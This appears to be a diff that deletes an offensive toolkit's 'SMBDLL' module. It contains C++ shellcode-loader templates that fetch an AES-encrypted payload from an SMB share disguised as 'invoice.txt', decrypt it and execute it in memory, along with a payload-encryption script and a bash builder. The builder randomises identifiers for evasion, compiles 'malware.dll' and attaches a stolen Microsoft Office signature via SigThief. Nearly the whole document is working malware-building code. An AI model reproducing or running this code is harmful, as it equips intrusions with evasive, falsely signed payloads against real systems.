-    PLARGE_INTEGER Timeout);
-
-typedef NTSTATUS(WINAPI* _NtClose)(
-    HANDLE Handle);
-
-DWORD WINAPI ThreadFunction(LPVOID lpParameter);
-
-void PrintError(const wchar_t* action) {}
-
-BOOL Random1(LPCWSTR szServer, LPCWSTR szFilePath, PBYTE* binaryData, SIZE_T* binarySize) {
-    BOOL operationSuccess = TRUE;
-    PBYTE allocatedMemory = NULL;
-
-    WCHAR szFullUNCPath[MAX_PATH];
-    swprintf_s(szFullUNCPath, MAX_PATH, L"\\\\%s\\%s", szServer, szFilePath);
-
-    HANDLE hFile = CreateFileW(szFullUNCPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
-    if (hFile == INVALID_HANDLE_VALUE) {
-        operationSuccess = FALSE;
-    }
-    else {
-        DWORD fileSize = GetFileSize(hFile, NULL);
-        if (fileSize == INVALID_FILE_SIZE) {
-            operationSuccess = FALSE;
-        }
-        else {
-            SIZE_T allocationSize = fileSize;
-
-            _NtAllocateVirtualMemory pNtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtAllocateVirtualMemory");
-            NTSTATUS status = pNtAllocateVirtualMemory(
-                GetCurrentProcess(),
-                (PVOID*)&allocatedMemory,
-                0,
-                &allocationSize,
-                MEM_COMMIT | MEM_RESERVE,
-                PAGE_READWRITE);
-
-            if (!NT_SUCCESS(status)) {
-                operationSuccess = FALSE;
-            }
-            else {
-                DWORD bytesRead;
-                if (!ReadFile(hFile, allocatedMemory, fileSize, &bytesRead, NULL)) {
-                    operationSuccess = FALSE;
-                }
-
-                *binaryData = allocatedMemory;
-                *binarySize = bytesRead;
-            }
-        }
-
-        CloseHandle(hFile);
-    }
-
-    return operationSuccess;
-}
-
-BOOL Random2(const PBYTE BinaryData, SIZE_T DataSize) {
-    LPVOID pMemory = VirtualAlloc(NULL, DataSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
-    if (pMemory == NULL) {
-        return FALSE;
-    }
-
-    memcpy(pMemory, BinaryData, DataSize);
-
-    _NtProtectVirtualMemory pNtProtectVirtualMemory = (_NtProtectVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtProtectVirtualMemory");
-    SIZE_T regionSize = DataSize;
-    ULONG oldProtect;
-    NTSTATUS status = pNtProtectVirtualMemory(
-        GetCurrentProcess(),
-        &pMemory,
-        &regionSize,
-        PAGE_NOACCESS,
-        &oldProtect);
-
-    if (!NT_SUCCESS(status)) {
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
-    status = pNtProtectVirtualMemory(
-        GetCurrentProcess(),
-        &pMemory,
-        &regionSize,
-        PAGE_EXECUTE_READ,
-        &oldProtect);
-
-    if (!NT_SUCCESS(status)) {
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
-    HANDLE hThread = CreateThread(NULL, 0, ThreadFunction, pMemory, CREATE_SUSPENDED, NULL);
-    if (hThread == NULL) {
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
-    ULONG suspendCount = ResumeThread(hThread);
-    if (suspendCount == (DWORD)-1) {
-        CloseHandle(hThread);
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
-    WaitForSingleObject(hThread, INFINITE);
-
-    _NtClose pNtClose = (_NtClose)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtClose");
-    status = pNtClose(hThread);
-
-    _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
-    status = pNtFreeVirtualMemory(
-        GetCurrentProcess(),
-        &pMemory,
-        &regionSize,
-        MEM_RELEASE);
-
-    return TRUE;
-}
-
-DWORD WINAPI ThreadFunction(LPVOID lpParameter) {
-    PBYTE BinaryData = (PBYTE)lpParameter;
-    typedef void (*FunctionPointer)();
-    FunctionPointer pFunction = (FunctionPointer)BinaryData;
-
-    pFunction();
-
-    return 0;
-}
-
-int Random3(char* Random4, unsigned int Random5, char* Random6, size_t Random6len) {
-    HCRYPTPROV hProv;
-    HCRYPTHASH hHash;
-    HCRYPTKEY hKey;
-
-    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
-        return -1;
-    }
-    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
-        return -1;
-    }
-    if (!CryptHashData(hHash, (BYTE*)Random6, (DWORD)Random6len, 0)) {
-        return -1;
-    }
-    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
-        return -1;
-    }
-
-    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, Random4, &Random5)) {
-        return -1;
-    }
-
-    CryptReleaseContext(hProv, 0);
-    CryptDestroyHash(hHash);
-    CryptDestroyKey(hKey);
-
-    return 0;
-}
-
-char Random7[] = KEYVALUE
-
-int main() {
-    LPCWSTR szServer = L"HOSTNAME";
-    LPCWSTR szFilePath = L"SHAREFOLDER\\SHELLCODEFILE";
-
-    PBYTE Random8;
-    SIZE_T Random8Size;
-
-    BOOL success = Random1(szServer, szFilePath, &Random8, &Random8Size);
-
-    if (success) {
-        Random3((char*)Random8, Random8Size, Random7, sizeof(Random7));
-
-        success = Random2(Random8, Random8Size);
-
-        _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
-        SIZE_T regionSize = Random8Size;
-        NTSTATUS status = pNtFreeVirtualMemory(
-            GetCurrentProcess(),
-            (PVOID*)&Random8,
-            &regionSize,
-            MEM_RELEASE);
-
-        LocalFree(Random8);
-    }
-
-    return success ? 0 : 1;
-}
-

+ 0 - 26
StageFright/StageFright/StageFright/SMBDLL/Resources/aesencrypt.py

@@ -1,26 +0,0 @@
-# Red Team Operator course code template
-# payload encryption with AES
-# 
-# author: reenz0h (twitter: @SEKTOR7net)
-
-import sys
-from base64 import b64encode
-from Crypto.Cipher import AES
-from Crypto.Util.Padding import pad
-from Crypto.Random import get_random_bytes
-import hashlib
-
-KEY = get_random_bytes(16)
-iv = 16 * b'\x00'
-cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
-
-try:
-    plaintext = open(sys.argv[1], "rb").read()
-except:
-    print("File argument needed! %s <raw payload file>" % sys.argv[0])
-    sys.exit()
-
-ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
-
-print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
-print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

Разница между файлами не показана из-за своего большого размера
+ 0 - 0
StageFright/StageFright/StageFright/SMBDLL/Resources/con.py


BIN
StageFright/StageFright/StageFright/SMBDLL/Resources/invoice.txt


BIN
StageFright/StageFright/StageFright/SMBDLL/Resources/malware.dll


+ 0 - 252
StageFright/StageFright/StageFright/SMBDLL/Resources/template.cpp

@@ -1,252 +0,0 @@
-#include <windows.h>
-#include <winternl.h>
-#include <wchar.h>
-#include <winternl.h>
-#include <winbase.h>
-#include <winnt.h>
-#include <fileapi.h>
-#include <stdio.h>
-#include <stdint.h>
-#include <stdlib.h>
-#include <string.h>
-#include <wincrypt.h>
-#include <psapi.h>
-#include <tlhelp32.h>
-
-#pragma comment(lib, "crypt32.lib")
-#pragma comment(lib, "advapi32.lib")
-
-#ifndef NTSTATUS
-typedef LONG NTSTATUS;
-#endif
-
-#ifndef NT_SUCCESS
-#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
-#endif
-
-typedef NTSTATUS(WINAPI* _NtAllocateVirtualMemory)(
-    HANDLE ProcessHandle,
-    PVOID* BaseAddress,
-    ULONG_PTR ZeroBits,
-    PSIZE_T RegionSize,
-    ULONG AllocationType,
-    ULONG Protect);
-
-typedef NTSTATUS(WINAPI* _NtFreeVirtualMemory)(
-    HANDLE ProcessHandle,
-    PVOID* BaseAddress,
-    PSIZE_T RegionSize,
-    ULONG FreeType);
-
-typedef NTSTATUS(WINAPI* _NtProtectVirtualMemory)(
-    HANDLE ProcessHandle,
-    PVOID* BaseAddress,
-    PSIZE_T RegionSize,
-    ULONG NewProtect,
-    PULONG OldProtect);
-
-typedef NTSTATUS(WINAPI* _NtCreateThreadEx)(
-    OUT PHANDLE ThreadHandle,
-    IN ACCESS_MASK DesiredAccess,
-    IN LPVOID ObjectAttributes,
-    IN HANDLE ProcessHandle,
-    IN LPTHREAD_START_ROUTINE StartAddress,
-    IN LPVOID Parameter,
-    IN BOOL CreateSuspended,
-    IN ULONG StackZeroBits,
-    IN ULONG SizeOfStackCommit,
-    IN ULONG SizeOfStackReserve,
-    OUT LPVOID BytesBuffer);
-
-typedef NTSTATUS(WINAPI* _NtWaitForSingleObject)(
-    HANDLE ObjectHandle,
-    BOOLEAN Alertable,
-    PLARGE_INTEGER Timeout);
-
-typedef NTSTATUS(WINAPI* _NtClose)(
-    HANDLE Handle);
-
-DWORD WINAPI ThreadFunction(LPVOID lpParameter);
-
-void PrintError(const wchar_t* action) {}
-
-BOOL ohztCLrjKceS(LPCWSTR szServer, LPCWSTR szFilePath, PBYTE* binaryData, SIZE_T* binarySize) {
-    BOOL operationSuccess = TRUE;
-    PBYTE allocatedMemory = NULL;
-
-    WCHAR szFullUNCPath[MAX_PATH];
-    swprintf_s(szFullUNCPath, MAX_PATH, L"\\\\%s\\%s", szServer, szFilePath);
-
-    HANDLE hFile = CreateFileW(szFullUNCPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
-    if (hFile == INVALID_HANDLE_VALUE) {
-        operationSuccess = FALSE;
-    }
-    else {
-        DWORD fileSize = GetFileSize(hFile, NULL);
-        if (fileSize == INVALID_FILE_SIZE) {
-            operationSuccess = FALSE;
-        }
-        else {
-            SIZE_T allocationSize = fileSize;
-
-            _NtAllocateVirtualMemory pNtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtAllocateVirtualMemory");
-            NTSTATUS status = pNtAllocateVirtualMemory(
-                GetCurrentProcess(),
-                (PVOID*)&allocatedMemory,
-                0,
-                &allocationSize,
-                MEM_COMMIT | MEM_RESERVE,
-                PAGE_READWRITE);
-
-            if (!NT_SUCCESS(status)) {
-                operationSuccess = FALSE;
-            }
-            else {
-                DWORD bytesRead;
-                if (!ReadFile(hFile, allocatedMemory, fileSize, &bytesRead, NULL)) {
-                    operationSuccess = FALSE;
-                }
-
-                *binaryData = allocatedMemory;
-                *binarySize = bytesRead;
-            }
-        }
-
-        CloseHandle(hFile);
-    }
-
-    return operationSuccess;
-}
-
-BOOL EpKOpQRlB(const PBYTE BinaryData, SIZE_T DataSize) {
-    LPVOID pMemory = VirtualAlloc(NULL, DataSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
-    if (pMemory == NULL) {
-        return FALSE;
-    }
-
-    memcpy(pMemory, BinaryData, DataSize);
-
-    _NtProtectVirtualMemory pNtProtectVirtualMemory = (_NtProtectVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtProtectVirtualMemory");
-    SIZE_T regionSize = DataSize;
-    ULONG oldProtect;
-    NTSTATUS status = pNtProtectVirtualMemory(
-        GetCurrentProcess(),
-        &pMemory,
-        &regionSize,
-        PAGE_NOACCESS,
-        &oldProtect);
-
-    if (!NT_SUCCESS(status)) {
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
-    status = pNtProtectVirtualMemory(
-        GetCurrentProcess(),
-        &pMemory,
-        &regionSize,
-        PAGE_EXECUTE_READ,
-        &oldProtect);
-
-    if (!NT_SUCCESS(status)) {
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
-    HANDLE hThread = CreateThread(NULL, 0, ThreadFunction, pMemory, CREATE_SUSPENDED, NULL);
-    if (hThread == NULL) {
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
-    ULONG suspendCount = ResumeThread(hThread);
-    if (suspendCount == (DWORD)-1) {
-        CloseHandle(hThread);
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
-    WaitForSingleObject(hThread, INFINITE);
-
-    _NtClose pNtClose = (_NtClose)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtClose");
-    status = pNtClose(hThread);
-
-    _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
-    status = pNtFreeVirtualMemory(
-        GetCurrentProcess(),
-        &pMemory,
-        &regionSize,
-        MEM_RELEASE);
-
-    return TRUE;
-}
-
-DWORD WINAPI ThreadFunction(LPVOID lpParameter) {
-    PBYTE BinaryData = (PBYTE)lpParameter;
-    typedef void (*FunctionPointer)();
-    FunctionPointer pFunction = (FunctionPointer)BinaryData;
-
-    pFunction();
-
-    return 0;
-}
-
-int rABIYwtsiD(char* Random4, unsigned int zHUdE, char* nPincKr, size_t nPincKrlen) {
-    HCRYPTPROV hProv;
-    HCRYPTHASH hHash;
-    HCRYPTKEY hKey;
-
-    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
-        return -1;
-    }
-    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
-        return -1;
-    }
-    if (!CryptHashData(hHash, (BYTE*)nPincKr, (DWORD)nPincKrlen, 0)) {
-        return -1;
-    }
-    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
-        return -1;
-    }
-
-    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, Random4, &zHUdE)) {
-        return -1;
-    }
-
-    CryptReleaseContext(hProv, 0);
-    CryptDestroyHash(hHash);
-    CryptDestroyKey(hKey);
-
-    return 0;
-}
-
-char VTOBIBvhNOZy[] =  { 0xa4, 0x49, 0xc1, 0x91, 0xfc, 0x7a, 0x55, 0x44, 0x92, 0x9a, 0xab, 0x5d, 0xb, 0x95, 0x2e, 0xd6 };
-
-extern "C" void CALLBACK Go(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
-    LPCWSTR szServer = L"Win11Blue";
-    LPCWSTR szFilePath = L"Shared\\invoice.txt";
-
-    PBYTE ymluXTmiPBZPy;
-    SIZE_T ymluXTmiPBZPySize;
-
-    BOOL success = ohztCLrjKceS(szServer, szFilePath, &ymluXTmiPBZPy, &ymluXTmiPBZPySize);
-
-    if (success) {
-        rABIYwtsiD((char*)ymluXTmiPBZPy, ymluXTmiPBZPySize, VTOBIBvhNOZy, sizeof(VTOBIBvhNOZy));
-
-        success = EpKOpQRlB(ymluXTmiPBZPy, ymluXTmiPBZPySize);
-
-        _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
-        SIZE_T regionSize = ymluXTmiPBZPySize;
-        NTSTATUS status = pNtFreeVirtualMemory(
-            GetCurrentProcess(),
-            (PVOID*)&ymluXTmiPBZPy,
-            &regionSize,
-            MEM_RELEASE);
-
-        LocalFree(ymluXTmiPBZPy);
-    }
-
-    return success ? 0 : 1;
-}
-

+ 0 - 181
StageFright/StageFright/StageFright/SMBDLL/SMBDLL.sh

@@ -1,181 +0,0 @@
-#!/bin/bash
-
-# Color variables
-red='\033[0;31m'
-green='\033[0;32m'
-yellow='\033[0;33m'
-blue='\033[0;34m'
-magenta='\033[0;35m'
-cyan='\033[0;36m'
-# Clear the color after that
-clear='\033[0m'
-cat << "EOF"          
-
- _____ _                       _   ________  _________  ______ _      _     
-/  ___| |                     | | /  ___|  \/  || ___ \ |  _  \ |    | |    
-\ `--.| |_ __ _  __ _  ___  __| | \ `--.| .  . || |_/ / | | | | |    | |    
- `--. \ __/ _` |/ _` |/ _ \/ _` |  `--. \ |\/| || ___ \ | | | | |    | |    
-/\__/ / || (_| | (_| |  __/ (_| | /\__/ / |  | || |_/ / | |/ /| |____| |____
-\____/ \__\__,_|\__, |\___|\__,_| \____/\_|  |_/\____/  |___/ \_____/\_____/
-                 __/ |                                                      
-                |___/                                                       
-
-EOF
-
-echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
-echo ""
-read Shellcode
-echo ""
-echo -e ${green}"What's The Hostname Of Your Target? ex: Win11Wkstn"${clear}
-echo ""
-read HOSTNAME
-echo ""
-echo -e ${green}"Enter The Share Name You're Hosting Your Shellcode From'. ex: CorporateShare"${clear}
-echo ""
-read SHAREFOLDER
-echo ""
-echo -e ${green}"Name Your Shellcode File. ex: invoice.txt"${clear}
-echo ""
-read SHELLCODEFILE
-echo ""
-echo -e ${green}"Name Your Entry Point Function"${clear}
-echo ""
-read ENTRYPOINT
-echo ""
-echo -e ${green}"Name Your Malware! ex: malware.dll"${clear}
-echo ""
-read MALWARE
-echo ""
-cp StageFright/SMBDLL/template.cpp StageFright/SMBDLL/Resources/template.cpp
-echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
-echo ""
-sleep 2
-python3 StageFright/SMBDLL/Resources/aesencrypt.py $Shellcode > shell.txt
-echo -e ${yellow}"***Encryption Completed***"${clear}
-echo ""
-cp shell.txt shell2.txt
-
-#Generate AES Key
-keys=$(cat "shell2.txt")
-cut -d 'p' -f1 shell2.txt > shell3.txt
-keys=$(cat shell3.txt)
-keysnow=${keys#*=}
-sed -i "s/KEYVALUE/$keysnow/g" StageFright/SMBDLL/Resources/template.cpp
-
-#Generate AES Payload
-payload=$(cat "shell.txt")
-payloadnow=${payload#*;}
-payloadtoday=${payloadnow#*=}
-echo $payloadtoday > shell5.txt
-cp StageFright/SMBDLL/conv.py StageFright/SMBDLL/Resources/con.py
-perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i StageFright/SMBDLL/Resources/con.py
-sed -i "s/{/[/g" -i StageFright/SMBDLL/Resources/con.py
-sed -i "s/}/]/g" -i StageFright/SMBDLL/Resources/con.py
-sed -i "s/;//g" -i StageFright/SMBDLL/Resources/con.py
-python3 StageFright/SMBDLL/Resources/con.py
-#rm StageFright/SMBDLL/Resources/con.py
-mv payload.bin $SHELLCODEFILE
-sleep 2
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-RandomE=$(cat shell.txt)
-sed -i "s/RandomE/$RandomE/g" StageFright/SMBDLL/Resources/template.cpp
-
-
-#Replace IP, PORT and SHELLCODEFILE
-sed -i "s/ENTRYPOINT/$ENTRYPOINT/g" StageFright/SMBDLL/Resources/template.cpp
-sed -i "s/SHAREFOLDER/$SHAREFOLDER/g" StageFright/SMBDLL/Resources/template.cpp
-sed -i "s/HOSTNAME/$HOSTNAME/g" StageFright/SMBDLL/Resources/template.cpp
-sed -i "s/SHELLCODEFILE/$SHELLCODEFILE/g" StageFright/SMBDLL/Resources/template.cpp
-#Replacing Values
-
-# Get Payload From URL Function
-
-#FindShare
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
-Random1=$(cat shell.txt)
-sed -i "s/Random1/$Random1/g" StageFright/SMBDLL/Resources/template.cpp
-
-#pPayloadBytes
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
-Random2=$(cat shell.txt)
-sed -i "s/Random2/$Random2/g" StageFright/SMBDLL/Resources/template.cpp
-
-#sPayloadSize
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
-Random3=$(cat shell.txt)
-sed -i "s/Random3/$Random3/g" StageFright/SMBDLL/Resources/template.cpp
-
-#bSTATE
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
-Random5=$(cat shell.txt)
-sed -i "s/Random5/$Random5/g" StageFright/SMBDLL/Resources/template.cpp
-
-#sSize
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-7} | head -n 1 > shell.txt
-Random6=$(cat shell.txt)
-sed -i "s/Random6/$Random6/g" StageFright/SMBDLL/Resources/template.cpp
-
-#hInternet
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
-Random7=$(cat shell.txt)
-sed -i "s/Random7/$Random7/g" StageFright/SMBDLL/Resources/template.cpp
-
-#dwBytesRead
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-13} | head -n 1 > shell.txt
-Random8=$(cat shell.txt)
-sed -i "s/Random8/$Random8/g" StageFright/SMBDLL/Resources/template.cpp
-
-#pBytes
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
-Random9=$(cat shell.txt)
-sed -i "s/Random9/$Random9/g" StageFright/SMBDLL/Resources/template.cpp
-
-#PAYLOAD
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-RandomA=$(cat shell.txt)
-sed -i "s/RandomA/$RandomA/g" StageFright/SMBDLL/Resources/template.cpp
-
-#Sleep Function
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
-RandomJ=$(cat shell.txt)
-sed -i "s/RandomJ/$RandomJ/g" StageFright/SMBDLL/Resources/template.cpp
-
-#AES KEY NAME
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
-RandomK=$(cat shell.txt)
-sed -i "s/RandomK/$RandomK/g" StageFright/SMBDLL/Resources/template.cpp
-
-# Main Function
-
-#Bytes
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
-RandomB=$(cat shell.txt)
-sed -i "s/RandomB/$RandomB/g" StageFright/SMBDLL/Resources/template.cpp
-
-#Size
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-RandomC=$(cat shell.txt)
-sed -i "s/RandomC/$RandomC/g" StageFright/SMBDLL/Resources/template.cpp
-
-#Compile
-
-echo -e ${yellow}"+++Compiling Malware+++"${clear}
-x86_64-w64-mingw32-g++ -shared -o $MALWARE StageFright/SMBDLL/Resources/template.cpp -lws2_32 -lntdll -static-libgcc -static-libstdc++ -Wl,--subsystem,windows -O2 -Wno-narrowing -fpermissive >/dev/null 2>&1
-echo ""
-sleep 2
-rm shell*
-echo -e ${yellow}"***Malware Compiled***"${clear}
-echo ""
-sleep 2
-echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
-echo ""
-sleep 2
-python3 python3 StageFright/Resources/SigThief/sigthief.py -i StageFright/Resources/OfficeSetup.exe-t $MALWARE -o signed$MALWARE >/dev/null 2>&1
-mv signed$MALWARE $MALWARE
-echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
-echo ""
-
-
-

+ 0 - 4
StageFright/StageFright/StageFright/SMBDLL/conv.py

@@ -1,4 +0,0 @@
-buf=PAYVAL 
-payload = bytes(bytearray(buf))
-with open('payload.bin', 'wb') as f:
-    f.write(payload)

+ 0 - 252
StageFright/StageFright/StageFright/SMBDLL/template.cpp

@@ -1,252 +0,0 @@
-#include <windows.h>
-#include <winternl.h>
-#include <wchar.h>
-#include <winternl.h>
-#include <winbase.h>
-#include <winnt.h>
-#include <fileapi.h>
-#include <stdio.h>
-#include <stdint.h>
-#include <stdlib.h>
-#include <string.h>
-#include <wincrypt.h>
-#include <psapi.h>
-#include <tlhelp32.h>
-
-#pragma comment(lib, "crypt32.lib")
-#pragma comment(lib, "advapi32.lib")
-
-#ifndef NTSTATUS
-typedef LONG NTSTATUS;
-#endif
-
-#ifndef NT_SUCCESS
-#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
-#endif
-
-typedef NTSTATUS(WINAPI* _NtAllocateVirtualMemory)(
-    HANDLE ProcessHandle,
-    PVOID* BaseAddress,
-    ULONG_PTR ZeroBits,
-    PSIZE_T RegionSize,
-    ULONG AllocationType,
-    ULONG Protect);
-
-typedef NTSTATUS(WINAPI* _NtFreeVirtualMemory)(
-    HANDLE ProcessHandle,
-    PVOID* BaseAddress,
-    PSIZE_T RegionSize,
-    ULONG FreeType);
-
-typedef NTSTATUS(WINAPI* _NtProtectVirtualMemory)(
-    HANDLE ProcessHandle,
-    PVOID* BaseAddress,
-    PSIZE_T RegionSize,
-    ULONG NewProtect,
-    PULONG OldProtect);
-
-typedef NTSTATUS(WINAPI* _NtCreateThreadEx)(
-    OUT PHANDLE ThreadHandle,
-    IN ACCESS_MASK DesiredAccess,
-    IN LPVOID ObjectAttributes,
-    IN HANDLE ProcessHandle,
-    IN LPTHREAD_START_ROUTINE StartAddress,
-    IN LPVOID Parameter,
-    IN BOOL CreateSuspended,
-    IN ULONG StackZeroBits,
-    IN ULONG SizeOfStackCommit,
-    IN ULONG SizeOfStackReserve,
-    OUT LPVOID BytesBuffer);
-
-typedef NTSTATUS(WINAPI* _NtWaitForSingleObject)(
-    HANDLE ObjectHandle,
-    BOOLEAN Alertable,
-    PLARGE_INTEGER Timeout);
-
-typedef NTSTATUS(WINAPI* _NtClose)(
-    HANDLE Handle);
-
-DWORD WINAPI ThreadFunction(LPVOID lpParameter);
-
-void PrintError(const wchar_t* action) {}
-
-BOOL Random1(LPCWSTR szServer, LPCWSTR szFilePath, PBYTE* binaryData, SIZE_T* binarySize) {
-    BOOL operationSuccess = TRUE;
-    PBYTE allocatedMemory = NULL;
-
-    WCHAR szFullUNCPath[MAX_PATH];
-    swprintf_s(szFullUNCPath, MAX_PATH, L"\\\\%s\\%s", szServer, szFilePath);
-
-    HANDLE hFile = CreateFileW(szFullUNCPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
-    if (hFile == INVALID_HANDLE_VALUE) {
-        operationSuccess = FALSE;
-    }
-    else {
-        DWORD fileSize = GetFileSize(hFile, NULL);
-        if (fileSize == INVALID_FILE_SIZE) {
-            operationSuccess = FALSE;
-        }
-        else {
-            SIZE_T allocationSize = fileSize;
-
-            _NtAllocateVirtualMemory pNtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtAllocateVirtualMemory");
-            NTSTATUS status = pNtAllocateVirtualMemory(
-                GetCurrentProcess(),
-                (PVOID*)&allocatedMemory,
-                0,
-                &allocationSize,
-                MEM_COMMIT | MEM_RESERVE,
-                PAGE_READWRITE);
-
-            if (!NT_SUCCESS(status)) {
-                operationSuccess = FALSE;
-            }
-            else {
-                DWORD bytesRead;
-                if (!ReadFile(hFile, allocatedMemory, fileSize, &bytesRead, NULL)) {
-                    operationSuccess = FALSE;
-                }
-
-                *binaryData = allocatedMemory;
-                *binarySize = bytesRead;
-            }
-        }
-
-        CloseHandle(hFile);
-    }
-
-    return operationSuccess;
-}
-
-BOOL Random2(const PBYTE BinaryData, SIZE_T DataSize) {
-    LPVOID pMemory = VirtualAlloc(NULL, DataSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
-    if (pMemory == NULL) {
-        return FALSE;
-    }
-
-    memcpy(pMemory, BinaryData, DataSize);
-
-    _NtProtectVirtualMemory pNtProtectVirtualMemory = (_NtProtectVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtProtectVirtualMemory");
-    SIZE_T regionSize = DataSize;
-    ULONG oldProtect;
-    NTSTATUS status = pNtProtectVirtualMemory(
-        GetCurrentProcess(),
-        &pMemory,
-        &regionSize,
-        PAGE_NOACCESS,
-        &oldProtect);
-
-    if (!NT_SUCCESS(status)) {
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
-    status = pNtProtectVirtualMemory(
-        GetCurrentProcess(),
-        &pMemory,
-        &regionSize,
-        PAGE_EXECUTE_READ,
-        &oldProtect);
-
-    if (!NT_SUCCESS(status)) {
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
-    HANDLE hThread = CreateThread(NULL, 0, ThreadFunction, pMemory, CREATE_SUSPENDED, NULL);
-    if (hThread == NULL) {
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
-    ULONG suspendCount = ResumeThread(hThread);
-    if (suspendCount == (DWORD)-1) {
-        CloseHandle(hThread);
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
-    WaitForSingleObject(hThread, INFINITE);
-
-    _NtClose pNtClose = (_NtClose)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtClose");
-    status = pNtClose(hThread);
-
-    _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
-    status = pNtFreeVirtualMemory(
-        GetCurrentProcess(),
-        &pMemory,
-        &regionSize,
-        MEM_RELEASE);
-
-    return TRUE;
-}
-
-DWORD WINAPI ThreadFunction(LPVOID lpParameter) {
-    PBYTE BinaryData = (PBYTE)lpParameter;
-    typedef void (*FunctionPointer)();
-    FunctionPointer pFunction = (FunctionPointer)BinaryData;
-
-    pFunction();
-
-    return 0;
-}
-
